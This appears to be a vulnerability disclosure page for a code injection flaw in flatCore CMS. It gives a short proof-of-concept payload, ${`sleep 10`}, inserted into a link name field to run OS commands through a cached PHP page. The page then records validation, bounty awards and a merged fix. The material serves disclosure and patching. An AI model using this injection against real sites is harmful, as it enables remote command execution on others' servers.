Code Injection in flatcore/flatcore-cms


Reported on

Oct 13th 2021


Another code injection payload in link_name.

Proof of Concept

Insert into linkname

${`sleep 10`}

Go to http://[FLATCORE-IP]/flatCore-CMS/content/cache/cache_lastedit.php and see that the page has stopped for 10 seconds.

${} escapes the string, ` switches context to OS commands.


Blind RCE as admin user.


should clean permalinks too

We have contacted a member of the flatcore/flatcore-cms team and are waiting to hear back a year ago
haxatron modified the report
a year ago
Patrick validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick confirmed that a fix has been merged on 2cb02c a year ago
Patrick has been awarded the fix bounty
functions.php#L389L397 has been validated
to join this conversation